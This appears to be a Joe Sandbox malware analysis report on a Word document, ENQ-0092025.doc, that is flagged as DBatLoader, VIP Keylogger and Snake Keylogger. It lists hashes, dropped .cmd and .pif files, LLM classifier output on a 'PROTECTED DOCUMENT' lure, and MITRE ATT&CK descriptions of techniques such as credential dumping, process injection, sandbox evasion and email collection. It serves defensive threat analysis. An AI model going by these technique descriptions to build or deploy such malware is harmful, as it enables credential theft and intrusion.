Memory Dump Source

Source File: 0000000C.00000002.3443915543.0000000026000000.00000040.00000800.00020000.00000000.sdmp, Offset: 26000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_26000000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 082fa88ffc917f8bab46b73fec19b34d41a99f9a2fa48b2576d84f06d149e1d6
Instruction ID: 200b4483fd82bc420bbdc66f009189a7df34cda0c7cfb126569bc4b3eb83af0c
Opcode Fuzzy Hash: 082fa88ffc917f8bab46b73fec19b34d41a99f9a2fa48b2576d84f06d149e1d6
Instruction Fuzzy Hash: D941E0B4D003489FEB14DFA9D884A9DBFF1BF09300F20912AE815AB290D7399985DF55

Function 2A29FDEE Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3455587633.000000002A290000.00000040.00000800.00020000.00000000.sdmp, Offset: 2A290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2a290000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 591316a3b63ff28feee1ff3f3bd10c3ff34b4f8b1ffec94a7cd697a9b7ae497d
Instruction ID: 342530afedc318ca213c439b7549bfa1625e837308bc1a0142a15eb2fbcdd515
Opcode Fuzzy Hash: 591316a3b63ff28feee1ff3f3bd10c3ff34b4f8b1ffec94a7cd697a9b7ae497d
Instruction Fuzzy Hash: 92D06774E54259AACB60DF69AC507ADB771AB96204F0020A68008B7510D7305A519A16

Input	Output
URL: Office document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PROTECTED DOCUMENT", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Office document Model: Joe Sandbox AI	{ "brands": [ "Microsoft Word" ] }
	{ "brands": [ "Microsoft Word" ] }
URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "PROTECTED DOCUMENT", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": true, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: Screenshot id: 11 Model: Joe Sandbox AI	{ "brands": [ "Microsoft Word" ] }
	{ "brands": [ "Microsoft Word" ] }

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ENQ-0092025.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DBatLoader

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Aiymwhpj.url

C:\Users\Public\AiymwhpjF.cmd

C:\Users\Public\Libraries\Aiymwhpj

C:\Users\Public\Libraries\Aiymwhpj.PIF

C:\Users\Public\Libraries\FX.cmd

C:\Users\Public\Libraries\NEO.cmd

C:\Users\Public\Libraries\jphwmyiA.pif

C:\Users\user\AppData\Local\Temp\~DF31826F4761D0A9B6.TMP

Windows Analysis Report
ENQ-0092025.doc

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre